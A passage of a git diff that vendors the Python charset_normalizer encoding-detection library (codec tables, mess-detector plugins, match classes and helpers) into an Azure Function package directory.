"cp861", "cp862", "cp863"], + "cp866": ["cp1125"], + "iso8859_10": ["iso8859_14", "iso8859_15", "iso8859_4", "iso8859_9", "latin_1"], + "iso8859_11": ["tis_620"], + "iso8859_13": ["cp1257"], + "iso8859_14": [ + "iso8859_10", + "iso8859_15", + "iso8859_16", + "iso8859_3", + "iso8859_9", + "latin_1", + ], + "iso8859_15": [ + "cp1252", + "cp1254", + "iso8859_10", + "iso8859_14", + "iso8859_16", + "iso8859_3", + "iso8859_9", + "latin_1", + ], + "iso8859_16": [ + "iso8859_14", + "iso8859_15", + "iso8859_2", + "iso8859_3", + "iso8859_9", + "latin_1", + ], + "iso8859_2": ["cp1250", "iso8859_16", "iso8859_4"], + "iso8859_3": ["iso8859_14", "iso8859_15", "iso8859_16", "iso8859_9", "latin_1"], + "iso8859_4": ["iso8859_10", "iso8859_2", "iso8859_9", "latin_1"], + "iso8859_7": ["cp1253"], + "iso8859_9": [ + "cp1252", + "cp1254", + "cp1258", + "iso8859_10", + "iso8859_14", + "iso8859_15", + "iso8859_16", + "iso8859_3", + "iso8859_4", + "latin_1", + ], + "kz1048": ["cp1251", "ptcp154"], + "latin_1": [ + "cp1252", + "cp1254", + "cp1258", + "iso8859_10", + "iso8859_14", + "iso8859_15", + "iso8859_16", + "iso8859_3", + "iso8859_4", + "iso8859_9", + ], + "mac_iceland": ["mac_roman", "mac_turkish"], + "mac_roman": ["mac_iceland", "mac_turkish"], + "mac_turkish": ["mac_iceland", "mac_roman"], + "ptcp154": ["cp1251", "kz1048"], + "tis_620": ["iso8859_11"], +} + + +CHARDET_CORRESPONDENCE: Dict[str, str] = { + "iso2022_kr": "ISO-2022-KR", + "iso2022_jp": "ISO-2022-JP", + "euc_kr": "EUC-KR", + "tis_620": "TIS-620", + "utf_32": "UTF-32", + "euc_jp": "EUC-JP", + "koi8_r": "KOI8-R", + "iso8859_1": "ISO-8859-1", + "iso8859_2": "ISO-8859-2", + "iso8859_5": "ISO-8859-5", + "iso8859_6": "ISO-8859-6", + "iso8859_7": "ISO-8859-7", + "iso8859_8": "ISO-8859-8", + "utf_16": "UTF-16", + "cp855": "IBM855", + "mac_cyrillic": "MacCyrillic", + "gb2312": "GB2312", + "gb18030": "GB18030", + "cp932": "CP932", + "cp866": "IBM866", + "utf_8": "utf-8", + "utf_8_sig": "UTF-8-SIG", + "shift_jis": "SHIFT_JIS", + "big5": "Big5", + "cp1250": "windows-1250", + "cp1251": "windows-1251", + "cp1252": "Windows-1252", + "cp1253": "windows-1253", + "cp1255": "windows-1255", + "cp1256": "windows-1256", + "cp1254": "Windows-1254", + "cp949": "CP949", +} + + +COMMON_SAFE_ASCII_CHARACTERS: Set[str] = { + "<", + ">", + "=", + ":", + "/", + "&", + ";", + "{", + "}", + "[", + "]", + ",", + "|", + '"', + "-", +} + + +KO_NAMES: Set[str] = {"johab", "cp949", "euc_kr"} +ZH_NAMES: Set[str] = {"big5", "cp950", "big5hkscs", "hz"} + +NOT_PRINTABLE_PATTERN = re_compile(r"[0-9\W\n\r\t]+") + +LANGUAGE_SUPPORTED_COUNT: int = len(FREQUENCIES) + +# Logging LEVEL bellow DEBUG +TRACE: int = 5 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/legacy.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/legacy.py new file mode 100644 index 0000000..e97e27c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/legacy.py @@ -0,0 +1,95 @@ +import warnings +from typing import Dict, Optional, Union + +from .api import from_bytes, from_fp, from_path, normalize +from .constant import CHARDET_CORRESPONDENCE +from .models import CharsetMatch, CharsetMatches + + +def detect(byte_str: bytes) -> Dict[str, Optional[Union[str, float]]]: + """ + chardet legacy method + Detect the encoding of the given byte string. It should be mostly backward-compatible. + Encoding name will match Chardet own writing whenever possible. (Not on encoding name unsupported by it) + This function is deprecated and should be used to migrate your project easily, consult the documentation for + further information. Not planned for removal. + + :param byte_str: The byte sequence to examine. + """ + if not isinstance(byte_str, (bytearray, bytes)): + raise TypeError( # pragma: nocover + "Expected object of type bytes or bytearray, got: " + "{0}".format(type(byte_str)) + ) + + if isinstance(byte_str, bytearray): + byte_str = bytes(byte_str) + + r = from_bytes(byte_str).best() + + encoding = r.encoding if r is not None else None + language = r.language if r is not None and r.language != "Unknown" else "" + confidence = 1.0 - r.chaos if r is not None else None + + # Note: CharsetNormalizer does not return 'UTF-8-SIG' as the sig get stripped in the detection/normalization process + # but chardet does return 'utf-8-sig' and it is a valid codec name. + if r is not None and encoding == "utf_8" and r.bom: + encoding += "_sig" + + return { + "encoding": encoding + if encoding not in CHARDET_CORRESPONDENCE + else CHARDET_CORRESPONDENCE[encoding], + "language": language, + "confidence": confidence, + } + + +class CharsetNormalizerMatch(CharsetMatch): + pass + + +class CharsetNormalizerMatches(CharsetMatches): + @staticmethod + def from_fp(*args, **kwargs): # type: ignore + warnings.warn( # pragma: nocover + "staticmethod from_fp, from_bytes, from_path and normalize are deprecated " + "and scheduled to be removed in 3.0", + DeprecationWarning, + ) + return from_fp(*args, **kwargs) # pragma: nocover + + @staticmethod + def from_bytes(*args, **kwargs): # type: ignore + warnings.warn( # pragma: nocover + "staticmethod from_fp, from_bytes, from_path and normalize are deprecated " + "and scheduled to be removed in 3.0", + DeprecationWarning, + ) + return from_bytes(*args, **kwargs) # pragma: nocover + + @staticmethod + def from_path(*args, **kwargs): # type: ignore + warnings.warn( # pragma: nocover + "staticmethod from_fp, from_bytes, from_path and normalize are deprecated " + "and scheduled to be removed in 3.0", + DeprecationWarning, + ) + return from_path(*args, **kwargs) # pragma: nocover + + @staticmethod + def normalize(*args, **kwargs): # type: ignore + warnings.warn( # pragma: nocover + "staticmethod from_fp, from_bytes, from_path and normalize are deprecated " + "and scheduled to be removed in 3.0", + DeprecationWarning, + ) + return normalize(*args, **kwargs) # pragma: nocover + + +class CharsetDetector(CharsetNormalizerMatches): + pass + + +class CharsetDoctor(CharsetNormalizerMatches): + pass diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/md.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/md.py new file mode 100644 index 0000000..6f52ed7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/md.py @@ -0,0 +1,553 @@ +from functools import lru_cache +from typing import List, Optional + +from .constant import COMMON_SAFE_ASCII_CHARACTERS, UNICODE_SECONDARY_RANGE_KEYWORD +from .utils import ( + is_accentuated, + is_ascii, + is_case_variable, + is_cjk, + is_emoticon, + is_hangul, + is_hiragana, + is_katakana, + is_latin, + is_punctuation, + is_separator, + is_symbol, + is_thai, + is_unprintable, + remove_accent, + unicode_range, +) + + +class MessDetectorPlugin: + """ + Base abstract class used for mess detection plugins. + All detectors MUST extend and implement given methods. + """ + + def eligible(self, character: str) -> bool: + """ + Determine if given character should be fed in. + """ + raise NotImplementedError # pragma: nocover + + def feed(self, character: str) -> None: + """ + The main routine to be executed upon character. + Insert the logic in witch the text would be considered chaotic. + """ + raise NotImplementedError # pragma: nocover + + def reset(self) -> None: # pragma: no cover + """ + Permit to reset the plugin to the initial state. + """ + raise NotImplementedError + + @property + def ratio(self) -> float: + """ + Compute the chaos ratio based on what your feed() has seen. + Must NOT be lower than 0.; No restriction gt 0. + """ + raise NotImplementedError # pragma: nocover + + +class TooManySymbolOrPunctuationPlugin(MessDetectorPlugin): + def __init__(self) -> None: + self._punctuation_count: int = 0 + self._symbol_count: int = 0 + self._character_count: int = 0 + + self._last_printable_char: Optional[str] = None + self._frenzy_symbol_in_word: bool = False + + def eligible(self, character: str) -> bool: + return character.isprintable() + + def feed(self, character: str) -> None: + self._character_count += 1 + + if ( + character != self._last_printable_char + and character not in COMMON_SAFE_ASCII_CHARACTERS + ): + if is_punctuation(character): + self._punctuation_count += 1 + elif ( + character.isdigit() is False + and is_symbol(character) + and is_emoticon(character) is False + ): + self._symbol_count += 2 + + self._last_printable_char = character + + def reset(self) -> None: # pragma: no cover + self._punctuation_count = 0 + self._character_count = 0 + self._symbol_count = 0 + + @property + def ratio(self) -> float: + if self._character_count == 0: + return 0.0 + + ratio_of_punctuation: float = ( + self._punctuation_count + self._symbol_count + ) / self._character_count + + return ratio_of_punctuation if ratio_of_punctuation >= 0.3 else 0.0 + + +class TooManyAccentuatedPlugin(MessDetectorPlugin): + def __init__(self) -> None: + self._character_count: int = 0 + self._accentuated_count: int = 0 + + def eligible(self, character: str) -> bool: + return character.isalpha() + + def feed(self, character: str) -> None: + self._character_count += 1 + + if is_accentuated(character): + self._accentuated_count += 1 + + def reset(self) -> None: # pragma: no cover + self._character_count = 0 + self._accentuated_count = 0 + + @property + def ratio(self) -> float: + if self._character_count == 0: + return 0.0 + ratio_of_accentuation: float = self._accentuated_count / self._character_count + return ratio_of_accentuation if ratio_of_accentuation >= 0.35 else 0.0 + + +class UnprintablePlugin(MessDetectorPlugin): + def __init__(self) -> None: + self._unprintable_count: int = 0 + self._character_count: int = 0 + + def eligible(self, character: str) -> bool: + return True + + def feed(self, character: str) -> None: + if is_unprintable(character): + self._unprintable_count += 1 + self._character_count += 1 + + def reset(self) -> None: # pragma: no cover + self._unprintable_count = 0 + + @property + def ratio(self) -> float: + if self._character_count == 0: + return 0.0 + + return (self._unprintable_count * 8) / self._character_count + + +class SuspiciousDuplicateAccentPlugin(MessDetectorPlugin): + def __init__(self) -> None: + self._successive_count: int = 0 + self._character_count: int = 0 + + self._last_latin_character: Optional[str] = None + + def eligible(self, character: str) -> bool: + return character.isalpha() and is_latin(character) + + def feed(self, character: str) -> None: + self._character_count += 1 + if ( + self._last_latin_character is not None + and is_accentuated(character) + and is_accentuated(self._last_latin_character) + ): + if character.isupper() and self._last_latin_character.isupper(): + self._successive_count += 1 + # Worse if its the same char duplicated with different accent. + if remove_accent(character) == remove_accent(self._last_latin_character): + self._successive_count += 1 + self._last_latin_character = character + + def reset(self) -> None: # pragma: no cover + self._successive_count = 0 + self._character_count = 0 + self._last_latin_character = None + + @property + def ratio(self) -> float: + if self._character_count == 0: + return 0.0 + + return (self._successive_count * 2) / self._character_count + + +class SuspiciousRange(MessDetectorPlugin): + def __init__(self) -> None: + self._suspicious_successive_range_count: int = 0 + self._character_count: int = 0 + self._last_printable_seen: Optional[str] = None + + def eligible(self, character: str) -> bool: + return character.isprintable() + + def feed(self, character: str) -> None: + self._character_count += 1 + + if ( + character.isspace() + or is_punctuation(character) + or character in COMMON_SAFE_ASCII_CHARACTERS + ): + self._last_printable_seen = None + return + + if self._last_printable_seen is None: + self._last_printable_seen = character + return + + unicode_range_a: Optional[str] = unicode_range(self._last_printable_seen) + unicode_range_b: Optional[str] = unicode_range(character) + + if is_suspiciously_successive_range(unicode_range_a, unicode_range_b): + self._suspicious_successive_range_count += 1 + + self._last_printable_seen = character + + def reset(self) -> None: # pragma: no cover + self._character_count = 0 + self._suspicious_successive_range_count = 0 + self._last_printable_seen = None + + @property + def ratio(self) -> float: + if self._character_count == 0: + return 0.0 + + ratio_of_suspicious_range_usage: float = ( + self._suspicious_successive_range_count * 2 + ) / self._character_count + + if ratio_of_suspicious_range_usage < 0.1: + return 0.0 + + return ratio_of_suspicious_range_usage + + +class SuperWeirdWordPlugin(MessDetectorPlugin): + def __init__(self) -> None: + self._word_count: int = 0 + self._bad_word_count: int = 0 + self._foreign_long_count: int = 0 + + self._is_current_word_bad: bool = False + self._foreign_long_watch: bool = False + + self._character_count: int = 0 + self._bad_character_count: int = 0 + + self._buffer: str = "" + self._buffer_accent_count: int = 0 + + def eligible(self, character: str) -> bool: + return True + + def feed(self, character: str) -> None: + if character.isalpha(): + self._buffer += character + if is_accentuated(character): + self._buffer_accent_count += 1 + if ( + self._foreign_long_watch is False + and (is_latin(character) is False or is_accentuated(character)) + and is_cjk(character) is False + and is_hangul(character) is False + and is_katakana(character) is False + and is_hiragana(character) is False + and is_thai(character) is False + ): + self._foreign_long_watch = True + return + if not self._buffer: + return + if ( + character.isspace() or is_punctuation(character) or is_separator(character) + ) and self._buffer: + self._word_count += 1 + buffer_length: int = len(self._buffer) + + self._character_count += buffer_length + + if buffer_length >= 4: + if self._buffer_accent_count / buffer_length > 0.34: + self._is_current_word_bad = True + # Word/Buffer ending with a upper case accentuated letter are so rare, + # that we will consider them all as suspicious. Same weight as foreign_long suspicious. + if is_accentuated(self._buffer[-1]) and self._buffer[-1].isupper(): + self._foreign_long_count += 1 + self._is_current_word_bad = True + if buffer_length >= 24 and self._foreign_long_watch: + self._foreign_long_count += 1 + self._is_current_word_bad = True + + if self._is_current_word_bad: + self._bad_word_count += 1 + self._bad_character_count += len(self._buffer) + self._is_current_word_bad = False + + self._foreign_long_watch = False + self._buffer = "" + self._buffer_accent_count = 0 + elif ( + character not in {"<", ">", "-", "=", "~", "|", "_"} + and character.isdigit() is False + and is_symbol(character) + ): + self._is_current_word_bad = True + self._buffer += character + + def reset(self) -> None: # pragma: no cover + self._buffer = "" + self._is_current_word_bad = False + self._foreign_long_watch = False + self._bad_word_count = 0 + self._word_count = 0 + self._character_count = 0 + self._bad_character_count = 0 + self._foreign_long_count = 0 + + @property + def ratio(self) -> float: + if self._word_count <= 10 and self._foreign_long_count == 0: + return 0.0 + + return self._bad_character_count / self._character_count + + +class CjkInvalidStopPlugin(MessDetectorPlugin): + """ + GB(Chinese) based encoding often render the stop incorrectly when the content does not fit and + can be easily detected. Searching for the overuse of '丅' and '丄'. + """ + + def __init__(self) -> None: + self._wrong_stop_count: int = 0 + self._cjk_character_count: int = 0 + + def eligible(self, character: str) -> bool: + return True + + def feed(self, character: str) -> None: + if character in {"丅", "丄"}: + self._wrong_stop_count += 1 + return + if is_cjk(character): + self._cjk_character_count += 1 + + def reset(self) -> None: # pragma: no cover + self._wrong_stop_count = 0 + self._cjk_character_count = 0 + + @property + def ratio(self) -> float: + if self._cjk_character_count < 16: + return 0.0 + return self._wrong_stop_count / self._cjk_character_count + + +class ArchaicUpperLowerPlugin(MessDetectorPlugin): + def __init__(self) -> None: + self._buf: bool = False + + self._character_count_since_last_sep: int = 0 + + self._successive_upper_lower_count: int = 0 + self._successive_upper_lower_count_final: int = 0 + + self._character_count: int = 0 + + self._last_alpha_seen: Optional[str] = None + self._current_ascii_only: bool = True + + def eligible(self, character: str) -> bool: + return True + + def feed(self, character: str) -> None: + is_concerned = character.isalpha() and is_case_variable(character) + chunk_sep = is_concerned is False + + if chunk_sep and self._character_count_since_last_sep > 0: + if ( + self._character_count_since_last_sep <= 64 + and character.isdigit() is False + and self._current_ascii_only is False + ): + self._successive_upper_lower_count_final += ( + self._successive_upper_lower_count + ) + + self._successive_upper_lower_count = 0 + self._character_count_since_last_sep = 0 + self._last_alpha_seen = None + self._buf = False + self._character_count += 1 + self._current_ascii_only = True + + return + + if self._current_ascii_only is True and is_ascii(character) is False: + self._current_ascii_only = False + + if self._last_alpha_seen is not None: + if (character.isupper() and self._last_alpha_seen.islower()) or ( + character.islower() and self._last_alpha_seen.isupper() + ): + if self._buf is True: + self._successive_upper_lower_count += 2 + self._buf = False + else: + self._buf = True + else: + self._buf = False + + self._character_count += 1 + self._character_count_since_last_sep += 1 + self._last_alpha_seen = character + + def reset(self) -> None: # pragma: no cover + self._character_count = 0 + self._character_count_since_last_sep = 0 + self._successive_upper_lower_count = 0 + self._successive_upper_lower_count_final = 0 + self._last_alpha_seen = None + self._buf = False + self._current_ascii_only = True + + @property + def ratio(self) -> float: + if self._character_count == 0: + return 0.0 + + return self._successive_upper_lower_count_final / self._character_count + + +@lru_cache(maxsize=1024) +def is_suspiciously_successive_range( + unicode_range_a: Optional[str], unicode_range_b: Optional[str] +) -> bool: + """ + Determine if two Unicode range seen next to each other can be considered as suspicious. + """ + if unicode_range_a is None or unicode_range_b is None: + return True + + if unicode_range_a == unicode_range_b: + return False + + if "Latin" in unicode_range_a and "Latin" in unicode_range_b: + return False + + if "Emoticons" in unicode_range_a or "Emoticons" in unicode_range_b: + return False + + # Latin characters can be accompanied with a combining diacritical mark + # eg. Vietnamese. + if ("Latin" in unicode_range_a or "Latin" in unicode_range_b) and ( + "Combining" in unicode_range_a or "Combining" in unicode_range_b + ): + return False + + keywords_range_a, keywords_range_b = unicode_range_a.split( + " " + ), unicode_range_b.split(" ") + + for el in keywords_range_a: + if el in UNICODE_SECONDARY_RANGE_KEYWORD: + continue + if el in keywords_range_b: + return False + + # Japanese Exception + range_a_jp_chars, range_b_jp_chars = ( + unicode_range_a + in ( + "Hiragana", + "Katakana", + ), + unicode_range_b in ("Hiragana", "Katakana"), + ) + if (range_a_jp_chars or range_b_jp_chars) and ( + "CJK" in unicode_range_a or "CJK" in unicode_range_b + ): + return False + if range_a_jp_chars and range_b_jp_chars: + return False + + if "Hangul" in unicode_range_a or "Hangul" in unicode_range_b: + if "CJK" in unicode_range_a or "CJK" in unicode_range_b: + return False + if unicode_range_a == "Basic Latin" or unicode_range_b == "Basic Latin": + return False + + # Chinese/Japanese use dedicated range for punctuation and/or separators. + if ("CJK" in unicode_range_a or "CJK" in unicode_range_b) or ( + unicode_range_a in ["Katakana", "Hiragana"] + and unicode_range_b in ["Katakana", "Hiragana"] + ): + if "Punctuation" in unicode_range_a or "Punctuation" in unicode_range_b: + return False + if "Forms" in unicode_range_a or "Forms" in unicode_range_b: + return False + + return True + + +@lru_cache(maxsize=2048) +def mess_ratio( + decoded_sequence: str, maximum_threshold: float = 0.2, debug: bool = False +) -> float: + """ + Compute a mess ratio given a decoded bytes sequence. The maximum threshold does stop the computation earlier. + """ + + detectors: List[MessDetectorPlugin] = [ + md_class() for md_class in MessDetectorPlugin.__subclasses__() + ] + + length: int = len(decoded_sequence) + 1 + + mean_mess_ratio: float = 0.0 + + if length < 512: + intermediary_mean_mess_ratio_calc: int = 32 + elif length <= 1024: + intermediary_mean_mess_ratio_calc = 64 + else: + intermediary_mean_mess_ratio_calc = 128 + + for character, index in zip(decoded_sequence + "\n", range(length)): + for detector in detectors: + if detector.eligible(character): + detector.feed(character) + + if ( + index > 0 and index % intermediary_mean_mess_ratio_calc == 0 + ) or index == length - 1: + mean_mess_ratio = sum(dt.ratio for dt in detectors) + + if mean_mess_ratio >= maximum_threshold: + break + + if debug: + for dt in detectors: # pragma: nocover + print(dt.__class__, dt.ratio) + + return round(mean_mess_ratio, 3) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/models.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/models.py new file mode 100644 index 0000000..55f6d0d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/models.py @@ -0,0 +1,392 @@ +import warnings +from collections import Counter +from encodings.aliases import aliases +from hashlib import sha256 +from json import dumps +from re import sub +from typing import Any, Dict, Iterator, List, Optional, Tuple, Union + +from .constant import NOT_PRINTABLE_PATTERN, TOO_BIG_SEQUENCE +from .md import mess_ratio +from .utils import iana_name, is_multi_byte_encoding, unicode_range + + +class CharsetMatch: + def __init__( + self, + payload: bytes, + guessed_encoding: str, + mean_mess_ratio: float, + has_sig_or_bom: bool, + languages: "CoherenceMatches", + decoded_payload: Optional[str] = None, + ): + self._payload: bytes = payload + + self._encoding: str = guessed_encoding + self._mean_mess_ratio: float = mean_mess_ratio + self._languages: CoherenceMatches = languages + self._has_sig_or_bom: bool = has_sig_or_bom + self._unicode_ranges: Optional[List[str]] = None + + self._leaves: List[CharsetMatch] = [] + self._mean_coherence_ratio: float = 0.0 + + self._output_payload: Optional[bytes] = None + self._output_encoding: Optional[str] = None + + self._string: Optional[str] = decoded_payload + + def __eq__(self, other: object) -> bool: + if not isinstance(other, CharsetMatch): + raise TypeError( + "__eq__ cannot be invoked on {} and {}.".format( + str(other.__class__), str(self.__class__) + ) + ) + return self.encoding == other.encoding and self.fingerprint == other.fingerprint + + def __lt__(self, other: object) -> bool: + """ + Implemented to make sorted available upon CharsetMatches items. + """ + if not isinstance(other, CharsetMatch): + raise ValueError + + chaos_difference: float = abs(self.chaos - other.chaos) + coherence_difference: float = abs(self.coherence - other.coherence) + + # Bellow 1% difference --> Use Coherence + if chaos_difference < 0.01 and coherence_difference > 0.02: + # When having a tough decision, use the result that decoded as many multi-byte as possible. + if chaos_difference == 0.0 and self.coherence == other.coherence: + return self.multi_byte_usage > other.multi_byte_usage + return self.coherence > other.coherence + + return self.chaos < other.chaos + + @property + def multi_byte_usage(self) -> float: + return 1.0 - len(str(self)) / len(self.raw) + + @property + def chaos_secondary_pass(self) -> float: + """ + Check once again chaos in decoded text, except this time, with full content. + Use with caution, this can be very slow. + Notice: Will be removed in 3.0 + """ + warnings.warn( + "chaos_secondary_pass is deprecated and will be removed in 3.0", + DeprecationWarning, + ) + return mess_ratio(str(self), 1.0) + + @property + def coherence_non_latin(self) -> float: + """ + Coherence ratio on the first non-latin language detected if ANY. + Notice: Will be removed in 3.0 + """ + warnings.warn( + "coherence_non_latin is deprecated and will be removed in 3.0", + DeprecationWarning, + ) + return 0.0 + + @property + def w_counter(self) -> Counter: + """ + Word counter instance on decoded text. + Notice: Will be removed in 3.0 + """ + warnings.warn( + "w_counter is deprecated and will be removed in 3.0", DeprecationWarning + ) + + string_printable_only = sub(NOT_PRINTABLE_PATTERN, " ", str(self).lower()) + + return Counter(string_printable_only.split()) + + def __str__(self) -> str: + # Lazy Str Loading + if self._string is None: + self._string = str(self._payload, self._encoding, "strict") + return self._string + + def __repr__(self) -> str: + return "".format(self.encoding, self.fingerprint) + + def add_submatch(self, other: "CharsetMatch") -> None: + if not isinstance(other, CharsetMatch) or other == self: + raise ValueError( + "Unable to add instance <{}> as a submatch of a CharsetMatch".format( + other.__class__ + ) + ) + + other._string = None # Unload RAM usage; dirty trick. + self._leaves.append(other) + + @property + def encoding(self) -> str: + return self._encoding + + @property + def encoding_aliases(self) -> List[str]: + """ + Encoding name are known by many name, using this could help when searching for IBM855 when it's listed as CP855. + """ + also_known_as: List[str] = [] + for u, p in aliases.items(): + if self.encoding == u: + also_known_as.append(p) + elif self.encoding == p: + also_known_as.append(u) + return also_known_as + + @property + def bom(self) -> bool: + return self._has_sig_or_bom + + @property + def byte_order_mark(self) -> bool: + return self._has_sig_or_bom + + @property + def languages(self) -> List[str]: + """ + Return the complete list of possible languages found in decoded sequence. + Usually not really useful. Returned list may be empty even if 'language' property return something != 'Unknown'. + """ + return [e[0] for e in self._languages] + + @property + def language(self) -> str: + """ + Most probable language found in decoded sequence. If none were detected or inferred, the property will return + "Unknown". + """ + if not self._languages: + # Trying to infer the language based on the given encoding + # Its either English or we should not pronounce ourselves in certain cases. + if "ascii" in self.could_be_from_charset: + return "English" + + # doing it there to avoid circular import + from charset_normalizer.cd import encoding_languages, mb_encoding_languages + + languages = ( + mb_encoding_languages(self.encoding) + if is_multi_byte_encoding(self.encoding) + else encoding_languages(self.encoding) + ) + + if len(languages) == 0 or "Latin Based" in languages: + return "Unknown" + + return languages[0] + + return self._languages[0][0] + + @property + def chaos(self) -> float: + return self._mean_mess_ratio + + @property + def coherence(self) -> float: + if not self._languages: + return 0.0 + return self._languages[0][1] + + @property + def percent_chaos(self) -> float: + return round(self.chaos * 100, ndigits=3) + + @property + def percent_coherence(self) -> float: + return round(self.coherence * 100, ndigits=3) + + @property + def raw(self) -> bytes: + """ + Original untouched bytes. + """ + return self._payload + + @property + def submatch(self) -> List["CharsetMatch"]: + return self._leaves + + @property + def has_submatch(self) -> bool: + return len(self._leaves) > 0 + + @property + def alphabets(self) -> List[str]: + if self._unicode_ranges is not None: + return self._unicode_ranges + # list detected ranges + detected_ranges: List[Optional[str]] = [ + unicode_range(char) for char in str(self) + ] + # filter and sort + self._unicode_ranges = sorted(list({r for r in detected_ranges if r})) + return self._unicode_ranges + + @property + def could_be_from_charset(self) -> List[str]: + """ + The complete list of encoding that output the exact SAME str result and therefore could be the originating + encoding. + This list does include the encoding available in property 'encoding'. + """ + return [self._encoding] + [m.encoding for m in self._leaves] + + def first(self) -> "CharsetMatch": + """ + Kept for BC reasons. Will be removed in 3.0. + """ + return self + + def best(self) -> "CharsetMatch": + """ + Kept for BC reasons. Will be removed in 3.0. + """ + return self + + def output(self, encoding: str = "utf_8") -> bytes: + """ + Method to get re-encoded bytes payload using given target encoding. Default to UTF-8. + Any errors will be simply ignored by the encoder NOT replaced. + """ + if self._output_encoding is None or self._output_encoding != encoding: + self._output_encoding = encoding + self._output_payload = str(self).encode(encoding, "replace") + + return self._output_payload # type: ignore + + @property + def fingerprint(self) -> str: + """ + Retrieve the unique SHA256 computed using the transformed (re-encoded) payload. Not the original one. + """ + return sha256(self.output()).hexdigest() + + +class CharsetMatches: + """ + Container with every CharsetMatch items ordered by default from most probable to the less one. + Act like a list(iterable) but does not implements all related methods. + """ + + def __init__(self, results: List[CharsetMatch] = None): + self._results: List[CharsetMatch] = sorted(results) if results else [] + + def __iter__(self) -> Iterator[CharsetMatch]: + yield from self._results + + def __getitem__(self, item: Union[int, str]) -> CharsetMatch: + """ + Retrieve a single item either by its position or encoding name (alias may be used here). + Raise KeyError upon invalid index or encoding not present in results. + """ + if isinstance(item, int): + return self._results[item] + if isinstance(item, str): + item = iana_name(item, False) + for result in self._results: + if item in result.could_be_from_charset: + return result + raise KeyError + + def __len__(self) -> int: + return len(self._results) + + def __bool__(self) -> bool: + return len(self._results) > 0 + + def append(self, item: CharsetMatch) -> None: + """ + Insert a single match. Will be inserted accordingly to preserve sort. + Can be inserted as a submatch. + """ + if not isinstance(item, CharsetMatch): + raise ValueError( + "Cannot append instance '{}' to CharsetMatches".format( + str(item.__class__) + ) + ) + # We should disable the submatch factoring when the input file is too heavy (conserve RAM usage) + if len(item.raw) <= TOO_BIG_SEQUENCE: + for match in self._results: + if match.fingerprint == item.fingerprint and match.chaos == item.chaos: + match.add_submatch(item) + return + self._results.append(item) + self._results = sorted(self._results) + + def best(self) -> Optional["CharsetMatch"]: + """ + Simply return the first match. Strict equivalent to matches[0]. + """ + if not self._results: + return None + return self._results[0] + + def first(self) -> Optional["CharsetMatch"]: + """ + Redundant method, call the method best(). Kept for BC reasons. + """ + return self.best() + + +CoherenceMatch = Tuple[str, float] +CoherenceMatches = List[CoherenceMatch] + + +class CliDetectionResult: + def __init__( + self, + path: str, + encoding: Optional[str], + encoding_aliases: List[str], + alternative_encodings: List[str], + language: str, + alphabets: List[str], + has_sig_or_bom: bool, + chaos: float, + coherence: float, + unicode_path: Optional[str], + is_preferred: bool, + ): + self.path: str = path + self.unicode_path: Optional[str] = unicode_path + self.encoding: Optional[str] = encoding + self.encoding_aliases: List[str] = encoding_aliases + self.alternative_encodings: List[str] = alternative_encodings + self.language: str = language + self.alphabets: List[str] = alphabets + self.has_sig_or_bom: bool = has_sig_or_bom + self.chaos: float = chaos + self.coherence: float = coherence + self.is_preferred: bool = is_preferred + + @property + def __dict__(self) -> Dict[str, Any]: # type: ignore + return { + "path": self.path, + "encoding": self.encoding, + "encoding_aliases": self.encoding_aliases, + "alternative_encodings": self.alternative_encodings, + "language": self.language, + "alphabets": self.alphabets, + "has_sig_or_bom": self.has_sig_or_bom, + "chaos": self.chaos, + "coherence": self.coherence, + "unicode_path": self.unicode_path, + "is_preferred": self.is_preferred, + } + + def to_json(self) -> str: + return dumps(self.__dict__, ensure_ascii=True, indent=4) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/py.typed b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/py.typed new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/utils.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/utils.py new file mode 100644 index 0000000..e1f576d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/utils.py @@ -0,0 +1,414 @@ +try: + # WARNING: unicodedata2 support is going to be removed in 3.0 + # Python is quickly catching up. + import unicodedata2 as unicodedata +except ImportError: + import unicodedata # type: ignore[no-redef] + +import importlib +import logging +from codecs import IncrementalDecoder +from encodings.aliases import aliases +from functools import lru_cache +from re import findall +from typing import Generator, List, Optional, Set, Tuple, Union + +from _multibytecodec import MultibyteIncrementalDecoder # type: ignore + +from .constant import ( + ENCODING_MARKS, + IANA_SUPPORTED_SIMILAR, + RE_POSSIBLE_ENCODING_INDICATION, + UNICODE_RANGES_COMBINED, + UNICODE_SECONDARY_RANGE_KEYWORD, + UTF8_MAXIMAL_ALLOCATION, +) + + +@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) +def is_accentuated(character: str) -> bool: + try: + description: str = unicodedata.name(character) + except ValueError: + return False + return ( + "WITH GRAVE" in description + or "WITH ACUTE" in description + or "WITH CEDILLA" in description + or "WITH DIAERESIS" in description + or "WITH CIRCUMFLEX" in description + or "WITH TILDE" in description + ) + + +@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) +def remove_accent(character: str) -> str: + decomposed: str = unicodedata.decomposition(character) + if not decomposed: + return character + + codes: List[str] = decomposed.split(" ") + + return chr(int(codes[0], 16)) + + +@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) +def unicode_range(character: str) -> Optional[str]: + """ + Retrieve the Unicode range official name from a single character. + """ + character_ord: int = ord(character) + + for range_name, ord_range in UNICODE_RANGES_COMBINED.items(): + if character_ord in ord_range: + return range_name + + return None + + +@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) +def is_latin(character: str) -> bool: + try: + description: str = unicodedata.name(character) + except ValueError: + return False + return "LATIN" in 